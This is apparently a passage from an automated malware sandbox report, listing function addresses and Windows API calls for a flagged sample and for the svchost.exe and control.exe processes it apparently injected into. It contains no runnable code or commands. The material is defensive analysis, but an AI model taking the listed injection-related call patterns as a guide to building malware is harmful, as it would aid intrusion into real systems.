                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E335C0 NtCreateMutant,LdrInitializeThunk,7_2_04E335C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E339B0 NtGetContextThread,LdrInitializeThunk,7_2_04E339B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32CF0 NtOpenProcess,7_2_04E32CF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32CC0 NtQueryVirtualMemory,7_2_04E32CC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32C00 NtQueryInformationProcess,7_2_04E32C00
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32DB0 NtEnumerateKey,7_2_04E32DB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32D00 NtSetInformationFile,7_2_04E32D00
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32EA0 NtAdjustPrivilegesToken,7_2_04E32EA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32E30 NtWriteVirtualMemory,7_2_04E32E30
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32FA0 NtQuerySection,7_2_04E32FA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32F90 NtProtectVirtualMemory,7_2_04E32F90
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32F60 NtCreateProcessEx,7_2_04E32F60
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32AB0 NtWaitForSingleObject,7_2_04E32AB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E32B80 NtQueryInformationFile,7_2_04E32B80
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E33090 NtSetValueKey,7_2_04E33090
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E33010 NtOpenDirectoryObject,7_2_04E33010
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E33D70 NtOpenThread,7_2_04E33D70
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E33D10 NtOpenProcessToken,7_2_04E33D10
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B78FA0 NtCreateFile,7_2_00B78FA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B791F0 NtDeleteFile,7_2_00B791F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B79100 NtReadFile,7_2_00B79100
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B79290 NtClose,7_2_00B79290
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B793E0 NtAllocateVirtualMemory,7_2_00B793E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004096A00_2_004096A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0042200C0_2_0042200C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0041A2170_2_0041A217
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004122160_2_00412216
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0042435D0_2_0042435D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004033C00_2_004033C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044F4300_2_0044F430
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004125E80_2_004125E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044663B0_2_0044663B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004138010_2_00413801
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0042096F0_2_0042096F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004129D00_2_004129D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004119E30_2_004119E3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040FA100_2_0040FA10
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00423C810_2_00423C81
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00411E780_2_00411E78
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00442E0C0_2_00442E0C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00420EC00_2_00420EC0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044CF170_2_0044CF17
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00444FD20_2_00444FD2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D9A3A80_2_03D9A3A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D96AA50_2_03D96AA5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D969240_2_03D96924
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D968E50_2_03D968E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BAA2_2_00401BAA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185E32_2_004185E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168432_2_00416843
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030762_2_00403076
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041683F2_2_0041683F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100F32_2_004100F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030802_2_00403080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1732_2_0040E173
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBB32_2_0042EBB3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BB92_2_00401BB9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FECD2_2_0040FECD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FED32_2_0040FED3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F02_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039003E62_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA3522_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C02C02_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E02742_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F41A22_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039001AA2_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F81CC2_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038301002_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA1182_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C81582_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D20002_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C02_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038647502_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038407702_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C6E02_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039005912_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038405352_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EE4F62_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E44202_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F24462_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F6BD72_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB402_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA802_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A02_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390A9A62_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038569622_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038268B82_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E8F02_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384A8402_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038428402_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BEFA02_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC82_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384CFE02_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03882F282_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860F302_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E2F302_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4F402_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852E902_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FCE932_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEEDB2_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FEE262_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840E592_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03858DBF2_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383ADE02_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384AD002_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DCD1F2_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0CB52_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830CF22_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840C002_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A2_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F132D2_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D34C2_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038452A02_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B2C02_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED2_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B02_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387516C2_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F1722_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390B16B2_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF0CC2_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C02_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F70E92_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF0E02_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF7B02_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F16CC2_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038856302_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DD5B02_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039095C32_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F75712_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FF43F2_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038314602_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FB802_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B5BF02_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387DBF92_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFB762_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DDAAC2_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03885AA02_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E1AA32_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EDAC62_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFA492_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7A462_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B3A6C2_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D59102_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038499502_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385B9502_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038438E02_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD8002_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03841F922_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFFB12_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD22_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03803FD52_2_03803FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFF092_2_038FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03849EB02_2_03849EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385FDC02_2_0385FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03843D402_2_03843D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F1D5A2_2_038F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F7D732_2_038F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FFCF22_2_038FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B9C322_2_038B9C32
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0437EC6C6_2_0437EC6C
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0437CCEC6_2_0437CCEC
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0439D72C6_2_0439D72C
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0437EA466_2_0437EA46
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0437EA4C6_2_0437EA4C
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_043853B86_2_043853B8
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_043853BC6_2_043853BC
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EAE4F67_2_04EAE4F6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB24467_2_04EB2446
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA44207_2_04EA4420
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EC05917_2_04EC0591
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E005357_2_04E00535
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E1C6E07_2_04E1C6E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DFC7C07_2_04DFC7C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E007707_2_04E00770
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E247507_2_04E24750
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E920007_2_04E92000
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB81CC7_2_04EB81CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EC01AA7_2_04EC01AA
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB41A27_2_04EB41A2
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E881587_2_04E88158
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DF01007_2_04DF0100
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E9A1187_2_04E9A118
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E802C07_2_04E802C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA02747_2_04EA0274
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EC03E67_2_04EC03E6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E0E3F07_2_04E0E3F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBA3527_2_04EBA352
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DF0CF27_2_04DF0CF2
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA0CB57_2_04EA0CB5
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E00C007_2_04E00C00
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DFADE07_2_04DFADE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E18DBF7_2_04E18DBF
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E0AD007_2_04E0AD00
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E9CD1F7_2_04E9CD1F
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBEEDB7_2_04EBEEDB
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E12E907_2_04E12E90
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBCE937_2_04EBCE93
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E00E597_2_04E00E59
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBEE267_2_04EBEE26
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E0CFE07_2_04E0CFE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DF2FC87_2_04DF2FC8
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E7EFA07_2_04E7EFA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E74F407_2_04E74F40
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E42F287_2_04E42F28
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E20F307_2_04E20F30
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA2F307_2_04EA2F30
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E2E8F07_2_04E2E8F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DE68B87_2_04DE68B8
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E0A8407_2_04E0A840
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E028407_2_04E02840
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E029A07_2_04E029A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04ECA9A67_2_04ECA9A6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E169627_2_04E16962
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DFEA807_2_04DFEA80
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB6BD77_2_04EB6BD7
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBAB407_2_04EBAB40
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DF14607_2_04DF1460
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBF43F7_2_04EBF43F
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EC95C37_2_04EC95C3
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E9D5B07_2_04E9D5B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB75717_2_04EB7571
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB16CC7_2_04EB16CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E456307_2_04E45630
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBF7B07_2_04EBF7B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB70E97_2_04EB70E9
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBF0E07_2_04EBF0E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E070C07_2_04E070C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EAF0CC7_2_04EAF0CC
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E0B1B07_2_04E0B1B0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04ECB16B7_2_04ECB16B
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E3516C7_2_04E3516C
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DEF1727_2_04DEF172
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA12ED7_2_04EA12ED
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E1B2C07_2_04E1B2C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E052A07_2_04E052A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E4739A7_2_04E4739A
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DED34C7_2_04DED34C
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB132D7_2_04EB132D
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBFCF27_2_04EBFCF2
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E79C327_2_04E79C32
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E1FDC07_2_04E1FDC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB7D737_2_04EB7D73
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E03D407_2_04E03D40
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB1D5A7_2_04EB1D5A
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E09EB07_2_04E09EB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DC3FD57_2_04DC3FD5
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DC3FD27_2_04DC3FD2
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBFFB17_2_04EBFFB1
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E01F927_2_04E01F92
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBFF097_2_04EBFF09
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E038E07_2_04E038E0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E6D8007_2_04E6D800
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E099507_2_04E09950
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E1B9507_2_04E1B950
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E959107_2_04E95910
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EADAC67_2_04EADAC6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E45AA07_2_04E45AA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E9DAAC7_2_04E9DAAC
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EA1AA37_2_04EA1AA3
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E73A6C7_2_04E73A6C
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBFA497_2_04EBFA49
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EB7A467_2_04EB7A46
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E75BF07_2_04E75BF0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E3DBF97_2_04E3DBF9
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04E1FB807_2_04E1FB80
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04EBFB767_2_04EBFB76
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B61CB07_2_00B61CB0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B5CBE07_2_00B5CBE0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B5CBDA7_2_00B5CBDA
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B5AE807_2_00B5AE80
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B5CE007_2_00B5CE00
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B652F07_2_00B652F0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B635507_2_00B63550
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B6354C7_2_00B6354C
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B7B8C07_2_00B7B8C0
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B6E77C7_2_04B6E77C
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B6E2C67_2_04B6E2C6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B753F17_2_04B753F1
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B6E3E47_2_04B6E3E4
